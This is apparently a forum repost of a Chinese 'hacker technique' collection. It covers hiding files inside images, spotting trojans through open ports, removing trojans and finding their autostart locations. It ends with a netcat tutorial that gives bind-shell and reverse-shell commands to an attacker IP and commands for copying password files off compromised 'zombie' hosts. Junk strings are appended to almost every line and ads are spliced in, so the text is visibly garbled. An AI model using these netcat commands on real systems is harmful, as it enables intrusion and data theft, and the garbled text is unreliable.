黑客技术 [复制链接]

如何把任意文件隐藏在一张图片里 %JBFG.+  
该技巧适合 Windows 2000 / XP / Vista %JBFG.+  
* 最好有基本的命令行知识。不过也没关系，按照下面的步骤做就行了。 %JBFG.+  
准备：1.一张图片 2.一个做试验的txt文件 3.WinRAR %JBFG.+  
步骤： %JBFG.+  
1：准备一张图片，比如 winshome.jpg。准备目标文件，比如test.txt。我们要实现把test.txt隐藏在图片里面。 %JBFG.+  
2：把要隐藏的文件 test.txt 用 WinRAR 压缩。生成 test.rar 压缩包 %JBFG.+  
3：打开命令行提示符：点击“开始→运行”，输入“cmd”。 %JBFG.+  
4：我们假设中两个文件都存放在“ D:”下。输入命令：copy /b D:winshome.jpg + D:test.rar D:winshome.jpg %JBFG.+  
5：ok，试试打开生成的图片 winshome.jpg，没错吧，的的确确是原来的图片。 %JBFG.+  
6：怎样打开那个 txt 文件？打开 WinRAR ，点击“文件→打开（快捷键 Ctrl + O ）”，然后选择文件类型为“所有文件”，找到 winshome.jpg ，选择打开看看，是不是有个 txt 文件？ %JBFG.+  
这种方法适用于所有文件,由于百度空间还没有支持附件上传的功能,这是上传文件的一个好方法

查看开放端口判断木马的方法 %JBFG.+  
1. Windows本身自带的netstat命令 %JBFG.+  
%JBFG.+  
　　 关于netstat命令，我们先来看看windows帮助文件中的介绍： %JBFG.+  
%JBFG.+  
　　 Netstat %JBFG.+  
%JBFG.+  
　　 显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。 %JBFG.+  
%JBFG.+  
　　 netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval] %JBFG.+  
%JBFG.+  
　　 参数 %JBFG.+  
%JBFG.+  
　　 -a %JBFG.+  
%JBFG.+  
　　 显示所有连接和侦听端口。服务器连接通常不显示。 %JBFG.+  
%JBFG.+  
　　 -e %JBFG.+  
%JBFG.+  
　　 显示以太网统计。该参数可以与 -s 选项结合使用。 %JBFG.+  
%JBFG.+  
　　 -n %JBFG.+  
%JBFG.+  
　　 以数字格式显示地址和端口号（而不是尝试查找名称）。 %JBFG.+  
%JBFG.+  
　 -s %JBFG.+  
%JBFG.+  
　　 显示每个协议的统计。默认情况下，显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。 %JBFG.+  
%JBFG.+  
　　 -p protocol %JBFG.+  
%JBFG.+  
　　 显示由 protocol 指定的协议的连接；protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计，protocol 可以是 tcp、udp、icmp 或 ip。 %JBFG.+  
%JBFG.+  
　　 -r %JBFG.+  
%JBFG.+  
　　 显示路由表的内容。 %JBFG.+  
%JBFG.+  
　　 interval %JBFG.+  
%JBFG.+  

重新显示所选的统计，在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数，netstat 将打印一次当前的配置信息。 %JBFG.+  
%JBFG.+  
好了，看完这些帮助文件，我们应该明白netstat命令的使用方法了。现在就让我们现学现用，用这个命令看一下自己的机器开放的端口。进入到命令行下，使用netstat命令的a和n两个参数： %JBFG.+  
%JBFG.+  
　　C:\>netstat -an %JBFG.+  
%JBFG.+  
　　Active Connections %JBFG.+  
%JBFG.+  
　　Proto Local Address Foreign Address State %JBFG.+  
%JBFG.+  
　　TCP 0.0.0.0:80 0.0.0.0:0 LISTENING %JBFG.+  
%JBFG.+  
　　TCP 0.0.0.0:21 0.0.0.0:0 LISTENING %JBFG.+  
%JBFG.+  
　　TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING %JBFG.+  
%JBFG.+  
　　UDP 0.0.0.0:445 0.0.0.0:0 %JBFG.+  
%JBFG.+  
　　UDP 0.0.0.0:1046 0.0.0.0:0 %JBFG.+  
%JBFG.+  
　　UDP 0.0.0.0:1047 0.0.0.0:0 %JBFG.+  
%JBFG.+  
　　解释一下，Active Connections是指当前本机活动连接，Proto是指连接使用的协议名称，Local Address是本地计算机的 IP 地址和连接正在使用的端口号，Foreign Address是连接该端口的远程计算机的 IP 地址和端口号，State则是表明TCP 连接的状态，你可以看到后面三行的监听端口是UDP协议的，所以没有State表示的状态。看！我的机器的7626端口已经开放，正在监听等待连接，像这样的情况极有可能是已经感染了冰河！急忙断开网络，用杀毒软件查杀病毒是正确的做法。 %JBFG.+  
%JBFG.+  
　　2． 工作在windows2000下的命令行工具fport %JBFG.+  
%JBFG.+  
　　使用windows2000的朋友要比使用windows9X的幸运一些，因为可以使用fport这个程序来显示本机开放端口与进程的对应关系。 %JBFG.+  
%JBFG.+  
　　Fport是FoundStone出品的一个用来列出系统中所有打开的TCP/IP和UDP端口，以及它们对应应用程序的完整路径、PID标识、进程名称等信息的软件。在命令行下使用，请看例子： %JBFG.+  
%JBFG.+  
　　D:\>fport.exe %JBFG.+  
%JBFG.+  
　　FPort v1.33 - TCP/IP Process to Port Mapper %JBFG.+  
%JBFG.+  
　　Copyright 2000 by Foundstone, Inc. %JBFG.+  
%JBFG.+  
　　http://www.foundstone.com %JBFG.+  

Pid Process Port Proto Path %JBFG.+  
%JBFG.+  
　　748 tcpsvcs -> 7 TCP C:\WINNT\System32\ tcpsvcs.exe %JBFG.+  
%JBFG.+  
　　748 tcpsvcs -> 9 TCP C:\WINNT\System32\tcpsvcs.exe %JBFG.+  
%JBFG.+  
　　748 tcpsvcs -> 19 TCP C:\WINNT\System32\tcpsvcs.exe %JBFG.+  
%JBFG.+  
　　416 svchost -> 135 TCP C:\WINNT\system32\svchost.exe %JBFG.+  
%JBFG.+  
　　是不是一目了然了。这下，各个端口究竟是什么程序打开的就都在你眼皮底下了。如果发现有某个可疑程序打开了某个可疑端口，可千万不要大意哦，也许那就是一只狡猾的木马！ %JBFG.+  
%JBFG.+  
　　Fport的最新版本是2.0。在很多网站都提供下载，但是为了安全起见，当然最好还是到它的老家去下：http://www.foundstone.com/knowledge/zips/fport.zip %JBFG.+  
3． 与Fport功能类似的图形化界面工具Active Ports %JBFG.+  
%JBFG.+  
　　Active Ports为SmartLine出品，你可以用来监视电脑所有打开的TCP/IP/UDP端口，不但可以将你所有的端口显示出来，还显示所有端口所对应的程序所在的路径，本地IP和远端IP(试图连接你的电脑IP)是否正在活动。 %JBFG.+  
%JBFG.+  
是不是很直观？更棒的是，它还提供了一个关闭端口的功能，在你用它发现木马开放的端口时，可以立即将端口关闭。这个软件工作在Windows NT/2000/XP平台下。你可以在http://www.smartline.ru/software/aports.zip得到它。 %JBFG.+  
%JBFG.+  
　　其实使用windows xp的用户无须借助其它软件即可以得到端口与进程的对应关系，因为windows xp所带的netstat命令比以前的版本多了一个O参数，使用这个参数就可以得出端口与进程的对应来。 %JBFG.+  
%JBFG.+  
　　上面介绍了几种查看本机开放端口，以及端口和进程对应关系的方法，通过这些方法可以轻松的发现基于TCP/UDP协议的木马，希望能给你的爱机带来帮助。但是对木马重在防范，而且如果碰上反弹端口木马，利用驱动程序及动态链接库技术制作的新木马时，以上这些方法就很难查出木马的痕迹了。所以我们一定要养成良好的上网习惯，不要随意运行邮件中的附件，安装一套杀毒软件，像国内的瑞星就是个查杀病毒和木马的好帮手。从网上下载的软件先用杀毒软件检查一遍再使用，在上网时打开网络防火墙和病毒实时监控，保护自己的机器不被可恨的木马入侵。 %JBFG.+  
%JBFG.+  

木马病毒的通用查杀方法 %JBFG.+  
“木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的办法。只要把Form的Visible属性设为False，ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。当然它也会悄无声息地启动，黑客当然不会指望用户每次启动后点击“木马”图标来运行服务端，“木马”会在每次用户启动时自动装载。Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、Win.ini、System.ini、注册表等都是“木马”藏身的好地方。 %JBFG.+  
    下面具体谈谈“木马”是怎样自动加载的。在Win.ini文件中，在WINDOWS]下面，“run=”和 “load=” 是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面应该什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成 command.exe(真正的系统文件为command.com)文件，如果不注意可能不会发现它不是真正的系统启动文件(特别是在Windows窗口下)。   %JBFG.+  
    在System.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINESO FTWAREMicrosoftWindowsCurrentVersionRun”下的Explorer键值改为Explorer= “C:WINDOWSexpiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY-CURRENTUSERSoftwareMicrosoftWindowsCurrentVersionRun”、“HKEY-USERS****SoftwareMicrosoftWindowsCurrentVersionRun”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下找到“木马”程序的文件名，再在整个注册表中搜索即可。 %JBFG.+  
    知道了“木马”的工作原理，查杀“木马”就变得很容易，如果发现有“木马”存在，最有效的方法就是马上将计算机与网络断开，防止黑客通过网络对你进行攻击。然后编辑win.ini文件，将[WINDOWS]下面，“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”；编辑system.ini文件，将[BOOT]下面的“shell=‘木马’文件”，更改为：“shell=explorer.exe”；在注册表中，用regedit对注册表进行编辑，先在“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下找到“木马”程序的文件名，再在整个注册表中搜索并替换掉“木马”程序，有时候还需注意的是：有的“木马”程序并不是直接 将“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下的“木马”键值删除就行了，因为有的“木马”如：BladeRunner“木马”，如果你删除它，“木马”会立即自动加上，你需要的是记下“木马”的名字与目录，然后退回到MS-DOS下，找到此“木马”文件并删除掉。重新启动计算机，然后再到注册表中将所有“木马”文件的键值删除。至此，我们就大功告成了。 %JBFG.+  
    发现病毒，无法清除怎么办？ %JBFG.+  
    Q：发现病毒，但是无论在安全模式还是Windows下都无法清除怎么办？ %JBFG.+  
    A：由于某些目录和文件的特殊性，无法直接清除（包括安全模式下杀毒等一些方式杀毒），而需要某些特殊手段清除的带毒文件。以下所说的目录均包含其下面的子目录。 %JBFG.+  
    1、带毒文件在\Temporary Internet Files目录下 %JBFG.+  
    由于这个目录下的文件，Windows会对此有一定的保护作用（未经证实）。所以对这个目录下的带毒文件即使在安全模式下也不能进行清除，对于这种情况，请先关闭其他一些程序软件，然后打开IE，选择IE工具栏中的"工具"\"Internet选项"，选择"删除文件"删除即可，如果有提示"删除所有脱机内容"，也请选上一并删除。 %JBFG.+  
    2、带毒文件在\_Restore目录下，或者System Volume Information目录下 %JBFG.+  
    这是系统还原存放还原文件的目录，只有在装了Windows Me/XP操作系统上才会有这个目录，由于系统对这个目录有保护作用。对于这种情况需要先取消"系统还原"功能，然后将带毒文件删除，甚至将整个目录删除也是可以的。 关闭系统还原方法。WindowsMe的话，禁用系统还原，DOS下删除。XP关闭系统还原的方法：右键单击“我的电脑”，选“属性”--“系统还原”--在“在所有驱动器上关闭系统还原”前面打勾--按“确定”退出。 %JBFG.+  
    3、带毒文件在.rar、.zip、.cab等压缩文件中 %JBFG.+  
    现今能支持直接查杀压缩文件中带毒文件的反病毒软件还很少，即使有也只能支持常用的一些压缩格式；所以，对于绝大多数的反病毒软件来说，最多只能检查出压缩文件中的带毒文件，而不能直接清除。而且有些加密了的压缩文件就更不可能直接清除了。 %JBFG.+  
    要清除压缩文件中的病毒，建议解压缩后清除，或者借助压缩工具软件的外挂杀毒程序的功能，对带毒的压缩文件进行杀毒。 %JBFG.+  
    4、病毒在引导区或者SUHDLOG.DAT或SUHDLOG.BAK文件中 %JBFG.+  
    这种病毒一般是引导区病毒，报告的病毒名称一般带有boot、wyx等字样。如果病毒只是存在于移动存储设备（如软盘、闪存盘、移动硬盘）上，就可以借助本地硬盘上的反病毒软件直接进行查杀；如果这种病毒是在硬盘上，则需要用干净的可引导盘启动进行查杀。 %JBFG.+  
    对于这类病毒建议用干净软盘启动进行查杀，不过在查杀之前一定要备份原来的引导区，特别是原来装有别的操作系统的情况，如日文Windows、Linux等。 %JBFG.+  
    如果没有干净的可引导盘，则可使用下面的方法进行应急杀毒： %JBFG.+  
    (1) 在别的计算机上做一张干净的可引导盘，此引导盘可以在Windows 95/98/ME系统上通过"添加／删除程序"进行制作，但要注意的是，制作软盘的操作系统须和自己所使用的操作系统相同； %JBFG.+  
    (2) 用这张软盘引导启动带毒的计算机，然后运行以下命令： %JBFG.+  
    A:\>fdisk/mbr %JBFG.+  
    A:\>sys a: c: %JBFG.+  
    如果带毒的文件是在SUHDLOG.DAT或SUHDLOG.BAK文件中，那么直接删除即可。这是系统在安装的时候对硬盘引导区做的一个备份文件，一般作用不大，病毒在其中已经不起作用了。 %JBFG.+  
    5、带毒文件的后缀名是.vir、.kav、.kbk等 %JBFG.+  
    这些文件一般是一些防毒软件对原来带毒的文件做的备份文件，一般情况下，如果确认这些文件已经无用了，那就将这些文件删除即可。 %JBFG.+  
    6、带毒文件在一些邮件文件中，如dbx、eml、box等 %JBFG.+  
    有些防毒软件可以直接检查这些邮件文件中的文件是否带毒，但往往不能对这些带毒的文件直接的进行操作，对于一些邮箱中的带毒的信件，可以根据防毒软件提供的信息找到那带毒的信件，删除信件中的附件或者删除该信件；如果是eml、nws一些信件文件带毒，可以用相关的邮件软件打开，确认该信件及其附件，然后删除相关内容。一般有大量的eml、nws的带毒文件的话，都是病毒自动生成的文件，建议都直接删除。 %JBFG.+  

7、文件中有病毒的残留代码 %JBFG.+  
    这种情况比较多见的就是带有CIH、Funlove、宏病毒（包括Word、Excel、Powerpoint和Wordpro等文档中的宏病毒）和个别网页病毒的残留代码，通常防毒软件对这些带有病毒残留代码的文件报告的病毒名称后缀通常是int、app等结尾，而且并不常见，如W32/FunLove.app、W32.Funlove.int。一般情况下，这些残留的代码不会影响正常程序的运行，也不会传染，如果需要彻底清除的话，要根据各个病毒的实际情况进行清除。 %JBFG.+  
   8、文件错误 "jl1.Ah  
    这种情况出现的并不多，通常是某些防毒软件将原来带毒的文件并没有很干净地清除病毒，也没有很好的修复文件，造成文件无法正常使用，同时造成别的防毒软件的误报。这些文件可以直接删除。 "jl1.Ah  
    9、加密的文件或目录 "jl1.Ah  
    对于一些加密了的文件或目录，请在解密后再进行病毒查杀。 "jl1.Ah  
    10、共享目录 "jl1.Ah  
    这里包括两种情况：本地共享目录和网络中远程共享目录（其中也包括映射盘）。遇到本地共享的目录中的带毒文件不能清除的情况，通常是局域网中别的用户在读写这些文件，杀毒的时候表现为无法直接清除这些带毒文件中的病毒，如果是有病毒在对这些目录在写病毒操作，表现为对共享目录进行清除病毒操作后，还是不断有文件被感染或者不断生成病毒文件。以上这两种情况，都建议取消共享，然后针对共享目录进行彻底查杀，恢复共享的时候，注意不要开放太高的权限，并对共享目录加设密码。对远程的共享目录（包括映射盘）查杀病毒的时候，首先要保证本地计算机的操作系统是干净的，同时对共享目录也有最高的读写权限。如果是远程计算机感染病毒的话，建议还是直接在远程计算机进行查杀病毒。特别的，如果在清除别的病毒的时侯都建议取消所有的本地共享，再进行杀毒操作。在平时的使用中，也应注意共享目录的安全性，加设密码，同时，非必要的情况下，不要直接读取远程共享目录中的文件，建议拷贝到本地检查过病毒后再进行操作。 "jl1.Ah  
    11、光盘等一些存储介质 "jl1.Ah  
    对于光盘上带有的病毒，不要试图直接清除，这是神仙也做不到的事情。同时，对另外一些存储设备查杀病毒的，也需要注意其是否处于写保护或者密码保护状态。 "jl1.Ah  

告诉你木马藏在哪 "jl1.Ah  
"jl1.Ah  
"jl1.Ah  
木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在人不知鬼不觉的状态下控制你或者监视你。下面就是木马潜伏的诡招，看了以后不要忘记采取绝招来对付这些损招哟！ "jl1.Ah  
"jl1.Ah  
　　1、集成到程序中 "jl1.Ah  
"jl1.Ah  
　　其实木马也是一个服务器-客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激活木马程序，那么木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。 "jl1.Ah  
"jl1.Ah  
　　2、隐藏在配置文件中 "jl1.Ah  
"jl1.Ah  
　　木马实在是太狡猾，知道菜鸟们平时使用的是图形化界面的操作系统，对于那些已经不太重要的配置文件大多数是不闻不问了，这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用，木马很容易就能在大家的计算机中运行、发作，从而偷窥或者监视大家。不过，现在这种方式不是很隐蔽，容易被发现，所以在Autoexec.bat和Config.sys中加载木马程序的并不多见，但也不能因此而掉以轻心哦。 "jl1.Ah  
"jl1.Ah  
　　3、潜伏在Win.ini中 "jl1.Ah  
"jl1.Ah  
　　木马要想达到控制或者监视计算机的目的，必须要运行，然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然，木马也早有心理准备，知道人类是高智商的动物，不会帮助它工作的，因此它必须找一个既安全又能在系统启动时自动运行的地方，于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看，在它的[windows]字段中有启动命令“load=”和“run=”，在一般情况下“=”后面是空白的，如果有后跟程序，比方说是这个样子：run=c:windowsfile.exe load=c:windowsfile.exe "jl1.Ah  
blog.bitsCN.com网管博客等你来搏 "jl1.Ah  
"jl1.Ah  
"jl1.Ah  
　　这时你就要小心了，这个file.exe很可能是木马哦。 "jl1.Ah  
"jl1.Ah  
　　4、伪装在普通文件中 "jl1.Ah  
"jl1.Ah  
　　这个方法出现的比较晚，不过现在很流行，对于不熟练的windows操作者，很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标, 再把文件名改为*.jpg.exe, 由于Win98默认设置是"不显示已知的文件后缀名",文件将会显示为*.jpg, 不注意的人一点这个图标就中木马了(如果你在程序中嵌一张图片就更完美了)。 "jl1.Ah  
"jl1.Ah  
　　5、内置到注册表中 "jl1.Ah  
"jl1.Ah  
　　上面的方法让木马着实舒服了一阵，既没有人能找到它，又能自动运行，真是快哉！然而好景不长，人类很快就把它的马脚揪了出来，并对它进行了严厉的惩罚！但是它还心有不甘，总结了失败教训后，认为上面的藏身之处很容易找，现在必须躲在不容易被人发现的地方，于是它想到了注册表！的确注册表由于比较复杂，木马常常喜欢藏在这里快活，赶快检查一下，有什么程序在其下，睁大眼睛仔细看了，别放过木马哦：HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值；HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值；HKEY-USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以“run”开头的键值。 dl.bitsCN.com网管软件下载 "jl1.Ah  
"jl1.Ah  
　　6、在System.ini中藏身 "jl1.Ah  
"jl1.Ah  
　　木马真是无处不在呀！什么地方有空子，它就往哪里钻！这不，Windows安装目录下的System.ini也是木马喜欢隐蔽的地方。还是小心点，打开这个文件看看，它与正常文件有什么不同，在该文件的[boot]字段中，是不是有这样的内容，那就是shell=Explorer.exe file.exe，如果确实有这样的内容，那你就不幸了，因为这里的file.exe就是木马服务端程序！另外，在System.ini中的[386Enh]字段，要注意检查在此段内的“driver=路径程序名”，这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这三个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，现在你该知道也要注意这里喽。 "jl1.Ah  
"jl1.Ah  
　　7、隐形于启动组中 "jl1.Ah  
"jl1.Ah  
　　有时木马并不在乎自己的行踪，它更注意的是能否自动加载到系统中，因为一旦木马加载到系统中，任你用什么方法你都无法将它赶跑(哎，这木马脸皮也真是太厚)，因此按照这个逻辑，启动组也是木马可以藏身的好地方，因为这里的确是自动加载运行的好场所。动组对应的文件夹为：C:windowsstart menuprogramsstartup，在注册表中的位置：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion bitsCN全力打造网管学习平台 "jl1.Ah  
"jl1.Ah  
　　ExplorerShellFolders Startup="C:windowsstart menuprogramsstartup"。要注意经常检查启动组哦！ "jl1.Ah  
"jl1.Ah  
　　8、隐蔽在Winstart.bat中 "jl1.Ah  
"jl1.Ah  
　　按照上面的逻辑理论，凡是利于木马能自动加载的地方，木马都喜欢呆。这不，Winstart.bat也是一个能自动被Windows加载运行的文件，它多数情况下为应用程序及Windows自动生成，在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。 "jl1.Ah  
"jl1.Ah  
　　9、捆绑在启动文件中 "jl1.Ah  
"jl1.Ah  
　　即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。 "jl1.Ah  
"jl1.Ah  
　　10、设置在超级连接中 "jl1.Ah  
"jl1.Ah  
　　木马的主人在网页上放置恶意代码，引诱用户点击，用户点击的结果不言而喻：开门揖盗！奉劝不要随便点击网页上的链接，除非你了解它，信任它，为它死了也愿意等等。 "jl1.Ah  
"jl1.Ah  

瑞士军刀NC教程 "jl1.Ah  
"jl1.Ah  
"jl1.Ah  
黑客瑞士军刀NC使用教程 "jl1.Ah  
"jl1.Ah  
1. 写在前面的话 "jl1.Ah  
"jl1.Ah  
###################################################################### "jl1.Ah  
"jl1.Ah  
NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大. "jl1.Ah  
"jl1.Ah  
对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了. "jl1.Ah  
"jl1.Ah  
1.1 NC.EXE是一个非标准的telnet客户端程序, "jl1.Ah  
"jl1.Ah  
1.2 还有一个putty.exe客户端程序,提供四种连接模式 "jl1.Ah  
%S<( z5  
-raw -telnet -rlogin -ssh. %S<( z5  
%S<( z5  
虽然现在也新出了GUI版的中文“NC”，但是相比起来还是这个好用。 %S<( z5  
%S<( z5  
###################################################################### %S<( z5  
%S<( z5  
2. Netcat 1.10 for NT 帮助信息 %S<( z5  
%S<( z5  
###################################################################### %S<( z5  
%S<( z5  
C:\WINDOWS\Desktop>nc -h %S<( z5  
%S<( z5  
[v1.10 NT] %S<( z5  
%S<( z5  
connect to somewhere: nc [-options] hostname port[s] [ports] ... %S<( z5  
%S<( z5  
listen for inbound: nc -l -p port [options] [hostname] [port] %S<( z5  
%S<( z5  
options: %S<( z5  
%S<( z5  
-d detach from console, background mode (后台模式) %S<( z5  
%S<( z5  
-e prog inbound program to exec [dangerous!!] %S<( z5  
%S<( z5  
-g gateway source-routing hop point[s], up to 8 %S<( z5  
%S<( z5  
-G num source-routing pointer: 4, 8, 12, ... %S<( z5  
%S<( z5  
-h this cruft (本帮助信息) %S<( z5  
%S<( z5  
-i secs delay interval for lines sent, ports scanned (延迟时间) %S<( z5  
%S<( z5  
-l listen mode, for inbound connects (监听模式,等待连接) %S<( z5  
%S<( z5  
-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听) %S<( z5  
%S<( z5  
-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析) %S<( z5  
%S<( z5  
-o file hex dump of traffic (十六进制模式输出文件,三段) %S<( z5  
%S<( z5  
-p port local port number (本地端口) %S<( z5  
%S<( z5  
-r randomize local and remote ports (随机本地远程端口) %S<( z5  
%S<( z5  
-s addr local source address (本地源地址) %S<( z5  
%S<( z5  
-t answer TELNET negotiation %S<( z5  
%S<( z5  
-u UDP mode %S<( z5  
%S<( z5  
-v verbose [use twice to be more verbose] (-vv 更多信息) %S<( z5  
%S<( z5  
-w secs timeout for connects and final net reads %S<( z5  
%S<( z5  
-z zero-I/O mode [used for scanning] (扫描模式,-vv) %S<( z5  
%S<( z5  
port numbers can be individual or ranges: m-n [inclusive] %S<( z5  
###################################################################### %S<( z5  
%S<( z5  
3. Netcat 1.10 常用的命令格式 %S<( z5  
%S<( z5  
###################################################################### %S<( z5  
%S<( z5  
3.1.端口的刺探： %S<( z5  
%S<( z5  
nc -vv ip port %S<( z5  
%S<( z5  
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
3.2.扫描器 %S<( z5  
%S<( z5  
nc -vv -w 5 ip port-port port %S<( z5  
%S<( z5  
nc -vv -z ip port-port port %S<( z5  
%S<( z5  
这样扫描会留下大量的痕迹，系统管理员会额外小心 %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
3.3. 后门 %S<( z5  
%S<( z5  
victim machine: //受害者的机器 %S<( z5  
%S<( z5  
nc -l -p port -e cmd.exe //win2000 %S<( z5  
%S<( z5  
nc -l -p port -e /bin/sh //unix,linux %S<( z5  
%S<( z5  
attacker machine: //攻击者的机器. %S<( z5  
%S<( z5  
nc ip -p port //连接victim_IP,然后得到一个shell。 %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
3.4.反向连接 %S<( z5  
%S<( z5  
attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击. %S<( z5  
%S<( z5  
//或者wollf的反向连接. %S<( z5  
%S<( z5  
nc -vv -l -p port %S<( z5  
%S<( z5  
victim machine: %S<( z5  
%S<( z5  
nc -e cmd.exe attacker ip -p port %S<( z5  
%S<( z5  
nc -e /bin/sh attacker ip -p port %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
或者： %S<( z5  
%S<( z5  
attacker machine: %S<( z5  
%S<( z5  
nc -vv -l -p port1 /*用于输入*/ %S<( z5  
%S<( z5  
nc -vv -l -p prot2 /*用于显示*/ %S<( z5  
%S<( z5  
victim machine: %S<( z5  
%S<( z5  
nc attacker_ip port1 　 cmd.exe 　 nc attacker_ip port2 %S<( z5  
%S<( z5  
nc attacker_ip port1 　 /bin/sh 　 nc attacker_ip port2 %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
139要加参数-s（nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP） %S<( z5  
%S<( z5  
这样就可以保证nc.exe优先于NETBIOS。 %S<( z5  
3.5.传送文件： %S<( z5  
%S<( z5  
3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来. %S<( z5  
%S<( z5  
nc -d -l -p port < path\filedest 　　　 /*attacker machine*/ 可以shell执行 %S<( z5  
%S<( z5  
nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl C退出 %S<( z5  
%S<( z5  
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl C. %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
3.5.2 attacker machine victim machine //上传命令文件到肉鸡 %S<( z5  
%S<( z5  
nc －vv -l -p port > path\file.txt　　　　　 /*victim machine*/ 需要Ctrl C退出 %S<( z5  
%S<( z5  
nc -d victim_ip port < path\filedest 　 /*attacker machine*/ 可以shell执行 %S<( z5  
%S<( z5  
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆. %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
结论: 可以传输ascii,bin文件.可以传输程序文件. %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
问题:连接某个ip后,传送完成后,需要发送Ctrl C退出nc.exe . %S<( z5  
%S<( z5  
或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了? %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
3.6 端口数据抓包. %S<( z5  
%S<( z5  
nc -vv -w 2 -o test.txt www.hackervip.com 80 21-15 %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error %S<( z5  
%S<( z5  
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr %S<( z5  
%S<( z5  
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized... %S<( z5  
%S<( z5  
< 00000084 83 00 00 01 8f # ..... %S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
%S<( z5  
3.7 telnet,自动批处理。 %S<( z5  
%S<( z5  
nc victim_ip port < path\file.cmd 　 /*victim machine*/ 显示执行过程. %S<( z5  
%S<( z5  
nc -vv victim_ip port < path\file.cmd 　 /*victim machine*/ 显示执行过程. %S<( z5  
z?PF9QL1  
z?PF9QL1  
z?PF9QL1  
nc -d victim_ip port < path\file.cmd 安静模式. z?PF9QL1  
z?PF9QL1  
z?PF9QL1  
z?PF9QL1  
_______________file.cmd________________________ z?PF9QL1  
z?PF9QL1  
password z?PF9QL1  
z?PF9QL1  
cd %windir% z?PF9QL1  
z?PF9QL1  
echo []=[%windir%] z?PF9QL1  
z?PF9QL1  
c: z?PF9QL1  
z?PF9QL1  
